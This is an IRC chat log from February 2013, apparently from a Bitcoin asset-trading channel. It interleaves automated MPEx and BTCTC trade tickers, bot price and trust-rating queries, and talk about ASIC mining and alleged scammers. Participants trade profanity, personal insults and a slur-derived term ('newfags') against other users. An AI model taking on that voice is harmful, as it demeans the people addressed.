http://www.gambling911.com/businessfinancial/major-us-facing-online-gambling-site-confirms-bitcoin-implemenation-012813.html Feb 14 15:18:30 [MPEX] [S.MPOE] 4321 @ 0.00064609 = 2.7918 BTC [+] Feb 14 15:18:32 [MPEX] [S.MPOE] 20829 @ 0.0006459 = 13.4535 BTC [-] Feb 14 15:22:22 [MPEX] [S.MPOE] 1109 @ 0.00064668 = 0.7172 BTC [+] Feb 14 15:22:24 [MPEX] [S.MPOE] 8320 @ 0.00064699 = 5.383 BTC [+] Feb 14 15:33:29 [BTCTC] [GSDPT] 2900 @ 0.006 = 17.4 BTC [-] Feb 14 15:33:37 http://www.youtube.com/watch?v=V92OBNsQgxU Feb 14 15:34:25 [MPEX] [S.DICE] 300 @ 0.0062799 = 1.884 BTC [+] Feb 14 15:42:26 [MPEX] [S.MPOE] 4321 @ 0.000646 = 2.7914 BTC [-] Feb 14 15:42:27 [MPEX] [S.MPOE] 6479 @ 0.0006459 = 4.1848 BTC [-] Feb 14 15:53:10 [MPEX] [S.MPOE] 17100 @ 0.0006459 = 11.0449 BTC [-] Feb 14 16:03:34 [MPEX] [S.MPOE] 4321 @ 0.00064664 = 2.7941 BTC [+] Feb 14 16:03:36 [MPEX] [S.MPOE] 4321 @ 0.00064669 = 2.7943 BTC [+] Feb 14 16:03:38 [MPEX] [S.MPOE] 8230 @ 0.00064699 = 5.3247 BTC [+] Feb 14 16:03:38 [MPEX] [S.MPOE] 10300 @ 0.00065144 = 6.7098 BTC [+] Feb 14 16:03:40 [MPEX] [S.MPOE] 16493 @ 0.0006527 = 10.765 BTC [+] Feb 14 16:03:42 [MPEX] [S.MPOE] 17800 @ 0.00065403 = 11.6417 BTC [+] Feb 14 16:03:43 [MPEX] [S.MPOE] 1435 @ 0.00065464 = 0.9394 BTC [+] Feb 14 16:04:28 makomk malaimo markedathome maximian midnightmagic mircea_popescu mjr_ mjr__ mod6 molec Feb 14 16:04:33 here you go mjr__ : http://trilema.com/2013/the-rarge-part-of-this-lally/ Feb 14 16:04:33 i have a feeling it's gonna be a wild day Feb 14 16:04:35 you're now famous Feb 14 16:07:01 [MPEX] [S.MPOE] 2400 @ 0.00064591 = 1.5502 BTC [-] Feb 14 16:07:11 wuah Feb 14 16:09:06 Nomura Securities copies MPEx after a year and a half… yeah here we go Feb 14 16:11:12 [MPEX] [S.MPOE] 1921 @ 0.00064591 = 1.2408 BTC [-] Feb 14 16:11:14 [MPEX] [S.MPOE] 9842 @ 0.0006459 = 6.3569 BTC [-] Feb 14 16:11:18 [MPEX] [S.MPOE] 6137 @ 0.00064246 = 3.9428 BTC [-] Feb 14 16:11:40 dun dun dun Feb 14 16:12:02 but it's the fact. first financial institution to use gpg ? mpex. Feb 14 16:12:10 porn & buttcoinz drive innovation irl. Feb 14 16:27:24 [MPEX] [S.MPOE] 4321 @ 0.00064253 = 2.7764 BTC [+] Feb 14 16:27:26 [MPEX] [S.MPOE] 10547 @ 0.00064246 = 6.776 BTC [-] Feb 14 16:27:28 [MPEX] [S.MPOE] 13319 @ 0.00064072 = 8.5337 BTC [-] Feb 14 16:27:30 [MPEX] [S.MPOE] 4213 @ 0.00063888 = 2.6916 BTC [-] Feb 14 16:30:37 [MPEX] [S.MPOE] 17150 @ 0.00063888 = 10.9568 BTC [-] Feb 14 16:31:55 honored to be cited...lol Feb 14 16:31:55 [MPEX] [S.MPOE] 1424 @ 0.00065464 = 0.9322 BTC [+] Feb 14 16:32:47 http://polimedia.us/dtng/c/res/18313.html#18346 that is actually pretty good. Feb 14 16:36:11 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Feb 14 16:37:10 [MPEX] [S.MPOE] 1041 @ 0.00065464 = 0.6815 BTC [+] Feb 14 16:37:12 [MPEX] [S.MPOE] 4321 @ 0.00065484 = 2.8296 BTC [+] Feb 14 16:37:14 [MPEX] [S.MPOE] 5507 @ 0.00065485 = 3.6063 BTC [+] Feb 14 16:37:15 [MPEX] [S.MPOE] 6231 @ 0.00065494 = 4.0809 BTC [+] Feb 14 16:49:44 [MPEX] [S.MPOE] 4321 @ 0.00064741 = 2.7975 BTC [-] Feb 14 16:49:46 [MPEX] [S.MPOE] 12679 @ 0.00064744 = 8.2089 BTC [+] Feb 14 16:52:39 http://www.news.com.au/technology/massive-google-security-flaw-puts-users-details-on-display-for-all-to-find/story-e6frfro0-1226577210852 Feb 14 16:52:43 google pulls a mtgox. Feb 14 16:54:19 [MPEX] [S.MPOE] 4321 @ 0.00064719 = 2.7965 BTC [-] Feb 14 16:54:21 [MPEX] [S.MPOE] 11439 @ 0.00064744 = 7.4061 BTC [+] Feb 14 16:55:22 http://patakk.tumblr.com/zef Feb 14 16:57:32 nothing there ? Feb 14 16:58:28 http://25.media.tumblr.com/e1307953d79b9c1a6ed4233436ef77f8/tumblr_mgog6jAtha1qc0s10o1_500.gif ? Feb 14 16:59:30 http://www.examiner.com/article/eu-recession-as-robin-hood-tax-begins?cid=rss Feb 14 16:59:31 lol Feb 14 16:59:53 its there Feb 14 16:59:58 just need a newer browser Feb 14 17:00:30 [MPEX] [S.MPOE] 4321 @ 0.00065491 = 2.8299 BTC [+] Feb 14 17:00:31 [MPEX] [S.MPOE] 9446 @ 0.00065494 = 6.1866 BTC [+] Feb 14 17:15:17 [MPEX] [S.MPOE] 12474 @ 0.00065494 = 8.1697 BTC [+] Feb 14 17:17:08 !ticker m s.mpoe Feb 14 17:17:09 [MPEX:S.MPOE] 1D: 0.00063679 / 0.00064677 / 0.00066098 (1409926 shares, 911.90 BTC), 7D: 0.0006153 / 0.00065584 / 0.0007 (18889176 shares, 12,388.36 BTC), 30D: 0.00059445 / 0.00066251 / 0.0007 (73333145 shares, 48,584.03 BTC) Feb 14 17:18:53 [MPEX] [S.MPOE] 3907 @ 0.00065268 = 2.55 BTC [-] Feb 14 17:18:55 [MPEX] [S.MPOE] 4321 @ 0.00063895 = 2.7609 BTC [-] Feb 14 17:18:57 [MPEX] [S.MPOE] 2263 @ 0.00063888 = 1.4458 BTC [-] Feb 14 17:29:16 [MPEX] [S.MPOE] 4321 @ 0.00064482 = 2.7863 BTC [+] Feb 14 17:29:18 [MPEX] [S.MPOE] 11129 @ 0.00064504 = 7.1787 BTC [+] Feb 14 17:35:38 [MPEX] [S.MPOE] 1650 @ 0.00064336 = 1.0615 BTC [-] Feb 14 17:35:40 [MPEX] [S.MPOE] 4321 @ 0.0006389 = 2.7607 BTC [-] Feb 14 17:35:42 [MPEX] [S.MPOE] 10429 @ 0.00063888 = 6.6629 BTC [-] Feb 14 17:40:15 [MPEX] [S.MPOE] 45 @ 0.00063888 = 0.0287 BTC [-] Feb 14 17:40:17 [MPEX] [S.MPOE] 4321 @ 0.00063755 = 2.7549 BTC [-] Feb 14 17:40:19 [MPEX] [S.MPOE] 21817 @ 0.00063754 = 13.9092 BTC [-] Feb 14 17:40:21 [MPEX] [S.MPOE] 15667 @ 0.00063654 = 9.9727 BTC [-] Feb 14 17:42:27 bouncy bitcoin. a lot of hungry mouths were waiting for that drop. Feb 14 17:42:29 ate it up Feb 14 17:44:42 ;;slap deadweasel Feb 14 17:44:45 ;;ticker Feb 14 17:44:46 BTCUSD ticker | Best bid: 25.86297, Best ask: 25.89910, Bid-ask spread: 0.03613, Last trade: 25.86297, 24 hour volume: 147093.07547354, 24 hour low: 21.72100, 24 hour high: 26.65000, 24 hour vwap: 25.00466 Feb 14 17:44:50 http://www.youtube.com/watch?v=9L3KU5eiEBo Feb 14 17:44:54 ;;bc,24hprc Feb 14 17:44:54 his mudder was a modder! Feb 14 17:44:55 24.96 Feb 14 17:45:12 mircea_popescu: at work, no videos. already use webIRC to get around blocks. Feb 14 17:45:25 seinfeld. Feb 14 17:45:51 still having fun on SA i hope? Feb 14 17:46:22 ;;bc,stats Feb 14 17:46:25 Current Blocks: 221145 | Current Difficulty: 3275464.586565617 | Next Difficulty At Block: 221759 | Next Difficulty In: 614 blocks | Next Difficulty In About: 3 days, 15 hours, 11 minutes, and 42 seconds | Next Difficulty Estimate: 3474257.66998 | Estimated Percent Change: 6.06916 Feb 14 17:47:06 BFL will deliver ASIC devices before March 1st; Feb 14 17:47:07 Confirmed bets: Feb 14 17:47:08 99 Feb 14 17:47:10 1 moar! Feb 14 17:47:11 DeadWeasel http://polimedia.us/dtng/c/res/18313.html Feb 14 17:47:13 enjoy lol Feb 14 17:47:26 kakobrekla: you mine? Feb 14 17:47:36 [MPEX] [S.MPOE] 4321 @ 0.00063679 = 2.7516 BTC [+] Feb 14 17:47:38 [MPEX] [S.MPOE] 1093 @ 0.00063659 = 0.6958 BTC [-] Feb 14 17:47:46 ya a fpga is running somewhere in the house Feb 14 17:47:53 rest is gone Feb 14 17:48:21 i'll take that as a yes, mircea_popescu Feb 14 17:48:32 what do you make with your FPGA? Feb 14 17:48:59 noise Feb 14 17:49:23 http://shrani.si/f/x/v5/oRgSUuC/img9233.jpg Feb 14 17:50:04 well, at least you're producing Feb 14 17:50:47 i keep it as a joke. Feb 14 17:51:08 might as well go solo. Feb 14 17:51:21 with that 260mhash Feb 14 17:51:34 one day you might get a block,. Feb 14 17:52:08 I get 171 with a ati 6770, but it's not worth it. Feb 14 17:52:27 just 171? Feb 14 17:52:35 i got 250 from 5770 Feb 14 17:52:39 back in the day Feb 14 17:52:40 feel free to stalk my wasting of electric: http://mining.three41.net/ Feb 14 17:52:42 5770s are way betta Feb 14 17:52:54 6770s just have a higher number. Feb 14 17:52:59 hehe Feb 14 17:53:06 passive 7870's sound elite to me Feb 14 17:53:17 a rig box full of passive cooled gpus Feb 14 17:53:24 i had a passive nvidia running at 105 degrees C for years Feb 14 17:57:32 bitdaytrade : Today at 12:09:28 PM : Go troll somewhere else. I'm working hard to raise the necessary funds. Very positive news are on the horizon. Feb 14 17:57:33 rofl. Feb 14 17:59:42 ugm Feb 14 17:59:48 you're not serious are you !? Feb 14 18:00:11 i am, alberto isnt. Feb 14 18:00:18 lol Feb 14 18:02:18 it's funny how scammers always have very positive news on the horison Feb 14 18:02:24 >>https://bitcointalk.org/index.php?topic=140366.msg1527172#msg1527172 Feb 14 18:02:28 sorta like gambling addicts/failed acresses Feb 14 18:02:42 poor eskimo, would hurt too much to write "you area right", he writes "you are not wrong" Feb 14 18:03:12 hahaha good1 Feb 14 18:08:11 [MPEX] [S.MPOE] 4321 @ 0.00064484 = 2.7864 BTC [+] Feb 14 18:08:13 [MPEX] [S.MPOE] 6171 @ 0.00064504 = 3.9805 BTC [+] Feb 14 18:08:14 [MPEX] [S.MPOE] 5149 @ 0.00065494 = 3.3723 BTC [+] Feb 14 18:08:15 [MPEX] [S.MPOE] 10409 @ 0.00065622 = 6.8306 BTC [+] Feb 14 18:18:02 [BTCTC] [GSDPT] 11 @ 0.006 = 0.066 BTC [-] Feb 14 18:20:27 [MPEX] [S.MPOE] 3228 @ 0.00063659 = 2.0549 BTC [-] Feb 14 18:20:29 [MPEX] [S.MPOE] 8372 @ 0.00063654 = 5.3291 BTC [-] Feb 14 18:25:26 [MPEX] [S.MPOE] 3891 @ 0.00065622 = 2.5534 BTC [+] Feb 14 18:25:28 [MPEX] [S.MPOE] 4321 @ 0.00065629 = 2.8358 BTC [+] Feb 14 18:25:30 [MPEX] [S.MPOE] 49 @ 0.0006563 = 0.0322 BTC [+] Feb 14 18:28:02 [HAVELOCK] [KCIM] 9 @ 0.99 = 8.91 BTC [+] Feb 14 18:31:02 [HAVELOCK] [KCIM] 2 @ 1 = 2 BTC [+] Feb 14 18:32:14 [MPEX] [S.MPOE] 4321 @ 0.00065609 = 2.835 BTC [-] Feb 14 18:32:15 [MPEX] [S.MPOE] 2929 @ 0.0006563 = 1.9223 BTC [+] Feb 14 18:42:15 http://www.lewrockwell.com/blog/lewrw/archives/132330.html Feb 14 18:42:33 apparently llewellyn didn't much care for this week's reality tv Feb 14 18:51:40 [BTCTC] [COGNITIVE] 1 @ 0.3399 BTC [+] Feb 14 18:54:22 [MPEX] [S.MPOE] 4321 @ 0.00063676 = 2.7514 BTC [-] Feb 14 18:54:24 [MPEX] [S.MPOE] 2629 @ 0.00063654 = 1.6735 BTC [-] Feb 14 18:55:12 fuck this shit Feb 14 18:55:52 ;;ticker Feb 14 18:55:53 BTCUSD ticker | Best bid: 26.42000, Best ask: 26.49999, Bid-ask spread: 0.07999, Last trade: 26.40901, 24 hour volume: 147397.72847532, 24 hour low: 21.72100, 24 hour high: 26.65000, 24 hour vwap: 25.02041 Feb 14 18:58:55 Bugpowder: what up? Feb 14 19:03:29 btc Feb 14 19:07:57 hey all. you can now invest in Cognitive with LTC :) https://www.litecoinglobal.com/security/COGNITIVE-PT Feb 14 19:09:32 and by invest you mean lose money with? Feb 14 19:13:26 !ticker cognitive-pt Feb 14 19:13:26 Your actions are useless. Feb 14 19:13:32 mkay Feb 14 19:18:34 ;;slap Garr255_Lappy Feb 14 19:19:32 kakobrekla, let me know when mining stock, not bonds, becomes unprofitable. Feb 14 19:19:45 im letting you know now. Feb 14 19:20:03 back up your words with math please Feb 14 19:20:03 [MPEX] [S.MPOE] 4321 @ 0.00064002 = 2.7655 BTC [+] Feb 14 19:20:19 wheres that bug chart Feb 14 19:22:30 is there a crossed quote on mpoe? Feb 14 19:31:38 0.00064089 4`321 Feb 14 19:31:38 4`321 0.00063996 Feb 14 19:31:39 neh ? Feb 14 19:31:54 [MPEX] [S.MPOE] 4321 @ 0.00063996 = 2.7653 BTC [-] Feb 14 19:31:56 [MPEX] [S.MPOE] 2879 @ 0.00063967 = 1.8416 BTC [-] Feb 14 19:32:24 Garr255_Lappy you got a graph of cognitive price somewhere ? Feb 14 19:33:24 mircea_popescu yes, https://btct.co/security/COGNITIVE Feb 14 19:33:28 [MPEX] [S.MPOE] 7300 @ 0.00063967 = 4.6696 BTC [-] Feb 14 19:33:56 how do i make that show something like a year ? Feb 14 19:34:01 (can i?) Feb 14 19:34:55 DeaDTerra: nice, glad to hear it Feb 14 19:35:03 yeeuh Feb 14 19:35:11 https://www.youtube.com/watch?feature=player_embedded&v=R5mMRiiCwak Feb 14 19:41:11 [MPEX] [S.MPOE] 4321 @ 0.00064037 = 2.767 BTC [+] Feb 14 19:41:13 [MPEX] [S.MPOE] 4321 @ 0.00064046 = 2.7674 BTC [+] Feb 14 19:41:14 [MPEX] [S.MPOE] 2158 @ 0.00064052 = 1.3822 BTC [+] Feb 14 19:44:30 mircea_popescu warren buffet is going to buy mpex for 1 billion dollars Feb 14 19:44:43 i don't think so. Feb 14 19:45:15 haha Feb 14 19:45:36 ;;asks 27 Feb 14 19:45:38 There are currently 13428.315 bitcoins offered at or under 27.0 USD, worth 360232.300725 USD in total. Feb 14 19:45:45 ;;asks 30 Feb 14 19:45:47 There are currently 34633.742 bitcoins offered at or under 30.0 USD, worth 974142.854562 USD in total. Feb 14 19:46:27 mining gold is only profitable for so long Feb 14 19:46:32 so there will be much hate to go around Feb 14 19:54:14 [BTCTC] [B.YABMC] 1 @ 0.0181 BTC [-] Feb 14 19:54:15 [BTCTC] [B.YABMC] 100 @ 0.018 = 1.8 BTC [-] Feb 14 19:54:17 [BTCTC] [B.YABMC] 14 @ 0.0154 = 0.2156 BTC [-] Feb 14 19:54:18 [BTCTC] [B.YABMC] 200 @ 0.0153 = 3.06 BTC [-] Feb 14 19:54:20 [BTCTC] [B.YABMC] 150 @ 0.0152 = 2.28 BTC [-] Feb 14 19:54:21 [BTCTC] [B.YABMC] 43 @ 0.0152 = 0.6536 BTC [-] Feb 14 19:54:23 [BTCTC] [B.YABMC] 50 @ 0.0151 = 0.755 BTC [-] Feb 14 19:54:33 heres some milk for mircea_popescu https://bitcointalk.org/index.php?topic=143962.0 Feb 14 19:55:10 i r get milk ? Feb 14 19:55:47 i shou;d prolly link that from mpex main page just for lulz. Feb 14 19:55:59 bitcoin is self destructive. Feb 14 19:56:10 it says. Feb 14 19:56:15 kakobrekla bitcoin is backed by lulz and drama! Feb 14 19:56:30 no wonder price is so high. Feb 14 19:56:32 and we all know those self feed and replicate Feb 14 19:56:45 so it can only go the way of the butt : upupup Feb 14 19:57:22 is never to high to buy and never too low to sell Feb 14 19:57:54 it's never too tight and never too deep Feb 14 19:58:03 it can be too big. Feb 14 19:58:20 i dunno, i don't have the full range of sensual experiences. Feb 14 19:58:33 well, thats what she said. Feb 14 19:58:36 no matter how deep, no matter how hiiiigh Feb 14 19:58:47 nono nononono nonono limiiit Feb 14 20:05:19 they're beating up on MPEx in bitcoin-otc... Feb 14 20:05:34 more nonsense about how "bad" teh website is lol Feb 14 20:07:52 (10:04) < FonziScheme> we're talking about the website, mod6. get over it Feb 14 20:07:55 (10:05) <+mod6> hahaha Feb 14 20:08:04 lolk Feb 14 20:08:28 newfags in #bitcoin-newfags having opinions and shit. Feb 14 20:08:51 these dumbshits sit in there and talk all kinds of trash. at some point I usually jump in and tell 'em what idiots they are. Feb 14 20:09:05 this is one of those moments Feb 14 20:09:24 ;;gettrust fonzischeme Feb 14 20:09:26 Trust relationship from user mircea_popescu to user fonzischeme: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=fonzischeme Feb 14 20:09:38 totally. Feb 14 20:09:58 (10:05) < FonziScheme> but if you want to discuss how crappy the CLI scripty is, we can do that Feb 14 20:10:01 (10:06) <+mod6> you want to dog on my code, feel free. Feb 14 20:10:04 (10:06) <+mod6> asswipe Feb 14 20:10:07 (10:06) < FonziScheme> wow. simma down. Feb 14 20:10:09 (10:06) < FonziScheme> panties, meet bunch. Feb 14 20:10:25 (10:07) <+mod6> then stop talking shit about stuff you don't understand FonziScheme Feb 14 20:10:28 (10:07) < FonziScheme> stop claiming no one understands it, mod5 Feb 14 20:10:33 fonzischeme may be under fbastage or reliablesource Feb 14 20:10:46 he's been on my ignore for a year Feb 14 20:10:48 ahh, he's mildly retarded Feb 14 20:10:50 wait. Feb 14 20:11:00 20450 fbastage 18 mircea_popescu 2013-02-11 17:33:47 -2 spammer and megalomaniac. Feb 14 20:11:02 this dude ? Feb 14 20:11:08 yes same guy Feb 14 20:11:29 fucking hell all these people talking about me that i don;t even know. Feb 14 20:11:31 well, that doesn't shock me in the least then. he has an axe to grind. Feb 14 20:11:44 at least ver WANTS to be a celebrity. Feb 14 20:13:34 they think they can just do 2minutes hate everyday and I wont call 'em out Feb 14 20:13:38 fuck that shit Feb 14 20:14:03 mr mod6enstein Feb 14 20:14:05 (10:01) <+Scrat> neofutur: i dont care about validation either but MPOE is the worst website ive seen since geocities Feb 14 20:14:14 (10:04) <+mod6> What MPEx is, is not a website. I'm not sure why people fail to understand that. It doesn't even really need a damn website. Feb 14 20:14:17 (10:04) <+mod6> lol Feb 14 20:14:33 mircea_popescu: ;) Feb 14 20:14:58 any connection between these fine folks and the douches embroiled in the "highest valued currency" wiki revert war ? Feb 14 20:15:08 I think there might be. Feb 14 20:15:29 I don't follow in there quite close enough these days. Feb 14 20:15:49 well since mpoe-pr is trolling stripper forums i kinda lost track of reddit Feb 14 20:15:56 haha Feb 14 20:16:00 tho in honesty is was a productive move. more lol. Feb 14 20:16:12 i bet that is moar lulz Feb 14 20:16:51 anyway, who's controlled-evaporating otc these days ? Feb 14 20:17:03 since rg's unfortunate irl job and everything Feb 14 20:17:26 seriously, its a bunch of dudes who even have neg ratings as oppers. Feb 14 20:17:34 o.0 Feb 14 20:18:50 i guess it successfully evaporated. Feb 14 20:18:52 one day last week (I forget who it was for now) there was someone op'd and I was like "WAH HOW DID DA SCAMMERZ GET OPZ?!" Feb 14 20:19:06 nanotube ^ Feb 14 20:19:17 you about ready to purge the bitcoin-otc oplist or give it moar time ? Feb 14 20:19:20 but... i guess they need some monitoring in there and there isnt a ton of trusted people left to do the job. Feb 14 20:20:47 521 active nicks in the channel, so that's up about 100 Feb 14 20:21:02 which is good. but man, there are some real dumbasses who think they run that show. Feb 14 20:21:32 i don't even remember what it used to be last year. Feb 14 20:21:44 396, 693, 936, something Feb 14 20:22:25 neg ratings aren't always a bad thing. neg ratings from an idiot source really aren't neg ratings. Feb 14 20:22:38 when I seem to check every now and then it seems to typically hover around 400-450 Feb 14 20:22:38 that's true. Feb 14 20:22:48 the whole point of otc is that you go by your web of trust Feb 14 20:22:53 not some stupid sum number Feb 14 20:23:02 imsaguy: I'm with you there. I need to find who I was talking about... the guy srsly looked like he had some scammer ratings. Feb 14 20:23:18 [MPEX] [S.MPOE] 2594 @ 0.00063967 = 1.6593 BTC [-] Feb 14 20:23:19 [MPEX] [S.MPOE] 4321 @ 0.00063655 = 2.7505 BTC [-] Feb 14 20:23:21 [MPEX] [S.MPOE] 6085 @ 0.00063654 = 3.8733 BTC [-] Feb 14 20:23:22 ;;getrating imsaguy Feb 14 20:23:22 WARNING: Currently not authenticated. User imsaguy, rated since Tue Aug 2 16:24:18 2011. Cumulative rating 318, from 132 total ratings. Received ratings: 124 positive, 8 negative. Sent ratings: 124 positive, 39 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=imsaguy Feb 14 20:23:26 8 negatives Feb 14 20:23:31 most are trolls Feb 14 20:23:41 half weren't active more than a week Feb 14 20:23:57 *nod* Feb 14 20:24:03 imsaguy who was at some point negative total so the rule about rating with negative had to be reverted ? Feb 14 20:24:03 most were because people don't/didn't understand how ratings work Feb 14 20:24:09 o you also have a +10 from PH Feb 14 20:24:12 [MPEX] [S.MPOE] 4321 @ 0.00063671 = 2.7512 BTC [+] Feb 14 20:24:13 [MPEX] [S.MPOE] 6242 @ 0.00063654 = 3.9733 BTC [-] Feb 14 20:24:26 kakobrekla: exactly, it all depends on who you trust, not hte absolute Feb 14 20:24:44 kakobrekla im sure he has pirate + too, it's how scamming works, you suck up to people. Feb 14 20:25:00 mircea_popescu: me? no. Feb 14 20:25:09 he didn't rate you !? Feb 14 20:25:12 ;;gettrust imsaguy pirateat40 Feb 14 20:25:14 Trust relationship from user imsaguy to user pirateat40: Level 1: 0, Level 2: 6 via 33 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=imsaguy&dest=pirateat40 Feb 14 20:25:18 the other way around silly. Feb 14 20:25:26 thats why I asked. Feb 14 20:25:40 im pretty sure pirate rated everyone Feb 14 20:25:51 I'm surprised my L2 to pirate is still positive Feb 14 20:25:53 it seriosly could have been Anduck i'm talking about Feb 14 20:25:57 ;;getrating pirateat40 Feb 14 20:25:57 WARNING: Currently not authenticated. User pirateat40, rated since Mon Aug 1 14:18:45 2011. Cumulative rating -125, from 89 total ratings. Received ratings: 55 positive, 34 negative. Sent ratings: 65 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=pirateat40 Feb 14 20:26:02 *seriously Feb 14 20:26:02 rating whores are a problem. Feb 14 20:26:18 kakobrekla, I used to be one. Feb 14 20:26:24 mod6: probably starsoccer Feb 14 20:26:34 The first few negatives take care of that though. Feb 14 20:26:39 haha Keefe has one too Feb 14 20:26:49 ;;getrating keefe Feb 14 20:26:49 WARNING: Currently not authenticated. User Keefe, rated since Mon Nov 8 10:37:04 2010. Cumulative rating 606, from 212 total ratings. Received ratings: 212 positive, 0 negative. Sent ratings: 221 positive, 7 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=Keefe Feb 14 20:26:51 pigeons: AHHH yeah Feb 14 20:26:54 thats who it was. Feb 14 20:27:03 im like WTF is this guy doing with ops. Feb 14 20:27:07 starsoccer doesn't know that he's a scammer Feb 14 20:27:09 mod6 anduck was the guy coming here ocasionally asking me like why im trusted and shit no ? Feb 14 20:27:13 yeah. Feb 14 20:27:19 seemed harmless kid rly. Feb 14 20:27:28 he's just a random guy with 1 bad rating... might be somewhat superficial. Feb 14 20:27:31 yeah Feb 14 20:27:34 many of the people with ops in there atm aren't on the access list Feb 14 20:27:37 like me for example Feb 14 20:27:46 so we're faking Feb 14 20:27:47 how does that work ? Feb 14 20:28:00 well, if I leave and come back, I won't have ops from chanserv Feb 14 20:28:04 I have to ask another op Feb 14 20:28:10 you just do /nick @imsaguy Feb 14 20:28:13 if nanotube leaves and comes back, chanserv can/will give him ops Feb 14 20:28:19 o o i see what you mean Feb 14 20:28:19 kakobrekla, not if you're not on the access list Feb 14 20:28:30 i kid i kid, that doesnt work even. Feb 14 20:28:42 oh so someone just does like /op imsaguy Feb 14 20:28:44 /op $nick does ;) Feb 14 20:28:51 mod6, exactly Feb 14 20:28:54 instead of telling ChanServ to hook you up Feb 14 20:28:57 got it. Feb 14 20:29:06 I'm too emotional with the bans sometimes Feb 14 20:29:09 so its good I'm not on the list Feb 14 20:29:15 ban first, ask questions never Feb 14 20:29:19 haha Feb 14 20:29:26 the entire banningthing is nonsense. Feb 14 20:29:37 perhaps Feb 14 20:29:39 but it does feel good Feb 14 20:29:41 :-x Feb 14 20:29:43 ya well. Feb 14 20:29:53 this chan is noban, it works fine. my chan is +m, works fine Feb 14 20:30:01 the stuff in between tho, with the banning... not so fine. Feb 14 20:30:04 it does get the point across to trolls with limited reach -- for everything else there's SupaDupa Feb 14 20:30:19 mod6, we fixed that though Feb 14 20:30:22 just takes persistance Feb 14 20:30:22 mod6 so gives idiot kids an incentive to read up on supaduping Feb 14 20:30:24 oh! sweet. Feb 14 20:30:35 imsaguy i thought freenode finally got their shit together ? Feb 14 20:30:46 well, we're talking two different things Feb 14 20:30:52 he was making tons of fake otc accounts Feb 14 20:30:59 a Feb 14 20:31:03 I would catch those almost as quickly as he made them Feb 14 20:31:09 freenode and the assbot were something else Feb 14 20:31:14 not this assbot Feb 14 20:31:17 the ass script Feb 14 20:31:20 goatse Feb 14 20:31:23 aye Feb 14 20:31:24 haha Feb 14 20:31:28 poor assbot Feb 14 20:31:38 he's the assets assistant! Feb 14 20:31:39 wanna goatse? Feb 14 20:31:52 hey im sensitive. Feb 14 20:31:57 no mod/ban channels work Feb 14 20:32:01 #bitcoin-mining has been Feb 14 20:32:05 then again, its mainly dead these days Feb 14 20:32:15 well since luke sold his btc for 25 Feb 14 20:32:18 no point in it anymore Feb 14 20:32:35 it was back when people were trying to figure out gpumining Feb 14 20:32:45 speaking of which Feb 14 20:32:47 now that the settings are pretty tried and true and almost obsolete Feb 14 20:32:47 ;;tslb Feb 14 20:32:51 Time since last block: 12 minutes and 42 seconds Feb 14 20:33:16 how do we know avalons/asicminers aren't premining a huge chain! Feb 14 20:33:32 because they're just mining Feb 14 20:33:37 avalon is lost in space Feb 14 20:33:39 cause it would work out better for them to just mine honestly Feb 14 20:34:06 ya but never underestimate. Feb 14 20:34:22 seems suspicious as all hell, weeks after everyonedelivered network is still humming at 25. Feb 14 20:34:37 huh? Feb 14 20:34:40 ;;diffchange Feb 14 20:34:42 Estimated percent change in difficulty this period | 6.19499 % based on data since last change | 10.21154 % based on data for last three days Feb 14 20:34:44 they just turned em up today really Feb 14 20:34:51 yesterday Feb 14 20:35:17 12TH is only like 50% of current network Feb 14 20:35:23 which means they only have 33% of combined Feb 14 20:35:29 that guy with the 1th was there since like the 12th neh ? Feb 14 20:35:31 at btcguild Feb 14 20:35:32 assuming full throttle Feb 14 20:35:39 its up and down Feb 14 20:35:49 probably dealing with heat and internet connection issues Feb 14 20:36:02 ya. th mining requires some stuff other than power plug. Feb 14 20:36:29 especially on older hardwear like theirs Feb 14 20:36:33 ware* Feb 14 20:36:36 the one thing that becomes interesting now is of course useful life. Feb 14 20:36:51 if a set mines at 12th on average for 500 hours and then pops Feb 14 20:36:51 it'll be interesting to see where things settle Feb 14 20:36:55 well.... that's not gonna be much Feb 14 20:37:10 ;;genrate 12000000 Feb 14 20:37:12 The expected generation output, at 12000000.0 Mhps, given difficulty of 3275464.58657, is 1842.44953278 BTC per day and 76.7687305327 BTC per hour. Feb 14 20:37:15 if they spike us up and then their gear dies early in a recalc cycle it'll be nasty. Feb 14 20:37:21 lol Feb 14 20:37:33 ;;calc 500/24*1842.44953278 Feb 14 20:37:34 38384.3652662 Feb 14 20:37:43 500 hours would be fine. Feb 14 20:37:52 not for the network tho. Feb 14 20:37:53 they only spent 20000 for it Feb 14 20:38:00 we'll be stuck with 25gh doing 5mn blocks Feb 14 20:38:19 avalon is coming Feb 14 20:38:21 bfl is coming Feb 14 20:38:28 it wouldn't be for too long that we'd be 'stuck' Feb 14 20:38:34 and right now, its only 1th anyway Feb 14 20:38:36 well, a coupla weeks Feb 14 20:38:40 not a real big deal Feb 14 20:38:43 enough for everyone to scream bloody murder Feb 14 20:38:52 gotta have something to bitch about Feb 14 20:38:56 if not that, it'd be something else. Feb 14 20:38:59 definitely. Feb 14 20:39:02 heh Feb 14 20:39:04 don't even try to fool yourself :p Feb 14 20:39:27 ok, its time to go stick my head in a meat grinder. Feb 14 20:39:31 enjoy the rest of your day/evening. Feb 14 20:39:38 upload vids. Feb 14 20:39:48 c-ya imsaguy Feb 14 20:39:54 better be a live stream Feb 14 20:39:57 or you'll get shit. Feb 14 20:40:06 scamming meat grinder vid. Feb 14 20:41:30 well you know, I am pirateat40 Feb 14 20:41:48 dude, I think that maybe you were the first person that sold me BTC. Feb 14 20:41:53 so for that, I thank you :) Feb 14 20:42:09 haha, I broke a lot of cherries back in the day Feb 14 20:42:12 who's that forum kid that keeps reporting on like, what pirate did in his hood Feb 14 20:42:19 bcb Feb 14 20:42:23 pirate never existed Feb 14 20:42:23 I gotta jet, I'm late Feb 14 20:42:23 a right Feb 14 20:42:34 girl usually notes him down as pcp Feb 14 20:42:36 [BTCTC] [SYNERGY] 1 @ 0.031 BTC [-] Feb 14 20:42:45 haha Feb 14 20:43:07 he actually one a 10 BTC bet on over 26 USD by Noon EST today. Feb 14 20:43:10 then a while back i referred to someone by her byname instead of their handle Feb 14 20:43:12 *won Feb 14 20:43:13 so i threw a shitfit Feb 14 20:43:23 now she's 